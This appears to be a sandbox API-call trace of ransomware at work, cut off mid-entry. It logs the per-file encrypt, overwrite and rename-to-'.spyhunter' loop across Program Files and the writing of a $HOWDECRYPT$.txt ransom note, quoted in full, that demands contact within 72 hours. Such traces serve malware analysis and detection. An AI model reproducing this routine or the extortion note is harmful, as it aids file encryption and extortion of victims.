1 [0095.246] GetProcessHeap () returned 0x2c0000 [0095.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0095.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbe8*=0x30) returned 1 [0095.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0095.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0095.246] StrStrW (lpFirst="MSB1ENES.ITS", lpSrch=".txt") returned 0x0 [0095.247] GetProcessHeap () returned 0x2c0000 [0095.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0095.247] ReadFile (in: hFile=0x16c, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfbac, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x25cfbac*=0x2800, lpOverlapped=0x0) returned 1 [0095.271] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.271] WriteFile (in: hFile=0x16c, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfbac, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x25cfbac*=0x2800, lpOverlapped=0x0) returned 1 [0095.271] GetProcessHeap () returned 0x2c0000 [0095.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0095.271] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.271] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfbac, lpOverlapped=0x0 | out: lpBuffer=0x25cfbec*, lpNumberOfBytesWritten=0x25cfbac*=0x4, lpOverlapped=0x0) returned 1 [0095.468] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfbac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfbac*=0x30, lpOverlapped=0x0) returned 1 [0095.468] CloseHandle (hObject=0x16c) returned 1 [0095.705] GetProcessHeap () returned 0x2c0000 [0095.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0095.705] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.spyhunter") returned 87 [0095.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its.spyhunter")) returned 1 [0095.706] GetProcessHeap () returned 0x2c0000 [0095.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0095.706] GetProcessHeap () returned 0x2c0000 [0095.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0095.706] GetProcessHeap () returned 0x2c0000 [0095.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3776e0 | out: hHeap=0x2c0000) returned 1 [0095.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbf0 | out: pbBuffer=0x25cfbf0) returned 1 [0095.706] GetProcessHeap () returned 0x2c0000 [0095.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0095.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbe8*=0x30) returned 1 [0095.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.492] GetProcessHeap () returned 0x2c0000 [0096.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0096.492] GetProcessHeap () returned 0x2c0000 [0096.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330de8 | out: hHeap=0x2c0000) returned 1 [0096.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.499] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.499] WriteFile (in: hFile=0x178, lpBuffer=0x25cfb1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfc48, lpOverlapped=0x0 | out: lpBuffer=0x25cfb1f*, lpNumberOfBytesWritten=0x25cfc48*=0x127, lpOverlapped=0x0) returned 1 [0096.500] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.500] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfc48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfc48*=0x2ac, lpOverlapped=0x0) returned 1 [0096.500] CloseHandle (hObject=0x178) returned 1 [0096.501] GetProcessHeap () returned 0x2c0000 [0096.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0096.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbe8 | out: pbBuffer=0x25cfbe8) returned 1 [0096.502] GetProcessHeap () returned 0x2c0000 [0096.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0096.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbe0*=0x30) returned 1 [0096.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0096.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0096.521] StrStrW (lpFirst="msolui100.dll", lpSrch=".txt") returned 0x0 [0096.521] GetProcessHeap () returned 0x2c0000 [0096.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0096.521] ReadFile (in: hFile=0x16c, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfba4, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x25cfba4*=0x2800, lpOverlapped=0x0) returned 1 [0096.796] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.796] WriteFile (in: hFile=0x16c, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfba4, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x25cfba4*=0x2800, lpOverlapped=0x0) returned 1 [0096.796] GetProcessHeap () returned 0x2c0000 [0096.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.796] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.796] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfba4, lpOverlapped=0x0 | out: lpBuffer=0x25cfbe4*, lpNumberOfBytesWritten=0x25cfba4*=0x4, lpOverlapped=0x0) returned 1 [0096.866] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfba4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfba4*=0x30, lpOverlapped=0x0) returned 1 [0096.866] CloseHandle (hObject=0x16c) returned 1 [0096.866] GetProcessHeap () returned 0x2c0000 [0096.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.866] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.spyhunter") returned 84 [0096.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolui100.dll.spyhunter")) returned 1 [0096.867] GetProcessHeap () returned 0x2c0000 [0096.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.867] GetProcessHeap () returned 0x2c0000 [0096.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0096.867] GetProcessHeap () returned 0x2c0000 [0096.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0096.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbe0 | out: pbBuffer=0x25cfbe0) returned 1 [0096.867] GetProcessHeap () returned 0x2c0000 [0096.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0096.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbd8*=0x30) returned 1 [0096.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0097.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0097.076] StrStrW (lpFirst="AG00157_.GIF", lpSrch=".txt") returned 0x0 [0097.076] GetProcessHeap () returned 0x2c0000 [0097.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12048 [0097.077] ReadFile (in: hFile=0x174, lpBuffer=0x2c12048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesRead=0x25cfb9c*=0x135b, lpOverlapped=0x0) returned 1 [0097.107] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffeca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.107] WriteFile (in: hFile=0x174, lpBuffer=0x2c12048*, nNumberOfBytesToWrite=0x135b, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesWritten=0x25cfb9c*=0x135b, lpOverlapped=0x0) returned 1 [0097.107] GetProcessHeap () returned 0x2c0000 [0097.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12048 | out: hHeap=0x2c0000) returned 1 [0097.107] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.107] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbdc*, lpNumberOfBytesWritten=0x25cfb9c*=0x4, lpOverlapped=0x0) returned 1 [0097.108] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb9c*=0x30, lpOverlapped=0x0) returned 1 [0097.108] CloseHandle (hObject=0x174) returned 1 [0097.108] GetProcessHeap () returned 0x2c0000 [0097.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c1e168 [0097.108] wnsprintfW (in: pszDest=0x2c1e168, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.spyhunter") returned 77 [0097.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.spyhunter")) returned 1 [0097.109] GetProcessHeap () returned 0x2c0000 [0097.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0097.109] GetProcessHeap () returned 0x2c0000 [0097.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0097.109] GetProcessHeap () returned 0x2c0000 [0097.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359310 | out: hHeap=0x2c0000) returned 1 [0097.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbe0 | out: pbBuffer=0x25cfbe0) returned 1 [0097.109] GetProcessHeap () returned 0x2c0000 [0097.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0097.109] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbd8*=0x30) returned 1 [0097.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0097.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0097.539] StrStrW (lpFirst="BS00224_.WMF", lpSrch=".txt") returned 0x0 [0097.539] GetProcessHeap () returned 0x2c0000 [0097.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12048 [0097.539] ReadFile (in: hFile=0x170, lpBuffer=0x2c12048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesRead=0x25cfb9c*=0x634, lpOverlapped=0x0) returned 1 [0097.621] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff9cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.621] WriteFile (in: hFile=0x170, lpBuffer=0x2c12048*, nNumberOfBytesToWrite=0x634, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesWritten=0x25cfb9c*=0x634, lpOverlapped=0x0) returned 1 [0097.621] GetProcessHeap () returned 0x2c0000 [0097.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12048 | out: hHeap=0x2c0000) returned 1 [0097.622] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.622] WriteFile (in: hFile=0x170, lpBuffer=0x25cfbdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbdc*, lpNumberOfBytesWritten=0x25cfb9c*=0x4, lpOverlapped=0x0) returned 1 [0097.622] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb9c*=0x30, lpOverlapped=0x0) returned 1 [0097.622] CloseHandle (hObject=0x170) returned 1 [0097.622] GetProcessHeap () returned 0x2c0000 [0097.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c1e168 [0097.622] wnsprintfW (in: pszDest=0x2c1e168, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.spyhunter") returned 77 [0097.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.spyhunter")) returned 1 [0097.622] GetProcessHeap () returned 0x2c0000 [0097.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0097.623] GetProcessHeap () returned 0x2c0000 [0097.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0097.623] GetProcessHeap () returned 0x2c0000 [0097.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1c250 | out: hHeap=0x2c0000) returned 1 [0097.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbd8 | out: pbBuffer=0x25cfbd8) returned 1 [0097.623] GetProcessHeap () returned 0x2c0000 [0097.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0097.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbd0*=0x30) returned 1 [0097.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0097.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 67 [0097.624] StrStrW (lpFirst="FD00296_.WMF", lpSrch=".txt") returned 0x0 [0097.624] GetProcessHeap () returned 0x2c0000 [0097.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12048 [0097.624] ReadFile (in: hFile=0x170, lpBuffer=0x2c12048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesRead=0x25cfb94*=0x2800, lpOverlapped=0x0) returned 1 [0097.796] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.796] WriteFile (in: hFile=0x170, lpBuffer=0x2c12048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x2c12048*, lpNumberOfBytesWritten=0x25cfb94*=0x2800, lpOverlapped=0x0) returned 1 [0097.796] GetProcessHeap () returned 0x2c0000 [0097.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12048 | out: hHeap=0x2c0000) returned 1 [0097.796] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.796] WriteFile (in: hFile=0x170, lpBuffer=0x25cfbd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x25cfbd4*, lpNumberOfBytesWritten=0x25cfb94*=0x4, lpOverlapped=0x0) returned 1 [0097.796] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb94*=0x30, lpOverlapped=0x0) returned 1 [0097.796] CloseHandle (hObject=0x170) returned 1 [0097.846] GetProcessHeap () returned 0x2c0000 [0097.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3886f8 [0097.847] wnsprintfW (in: pszDest=0x3886f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.spyhunter") returned 77 [0097.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf.spyhunter")) returned 1 [0097.852] GetProcessHeap () returned 0x2c0000 [0097.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3886f8 | out: hHeap=0x2c0000) returned 1 [0097.852] GetProcessHeap () returned 0x2c0000 [0097.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0097.852] GetProcessHeap () returned 0x2c0000 [0097.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c15dc8 | out: hHeap=0x2c0000) returned 1 [0097.853] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbd8 | out: pbBuffer=0x25cfbd8) returned 1 [0097.853] GetProcessHeap () returned 0x2c0000 [0097.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0097.853] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbd0*=0x30) returned 1 [0097.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 67 [0098.115] StrStrW (lpFirst="HH00685_.WMF", lpSrch=".txt") returned 0x0 [0098.115] GetProcessHeap () returned 0x2c0000 [0098.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x38c790 [0098.115] ReadFile (in: hFile=0x170, lpBuffer=0x38c790, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesRead=0x25cfb94*=0xfc0, lpOverlapped=0x0) returned 1 [0098.116] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff040, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.116] WriteFile (in: hFile=0x170, lpBuffer=0x38c790*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesWritten=0x25cfb94*=0xfc0, lpOverlapped=0x0) returned 1 [0098.116] GetProcessHeap () returned 0x2c0000 [0098.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c790 | out: hHeap=0x2c0000) returned 1 [0098.117] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, 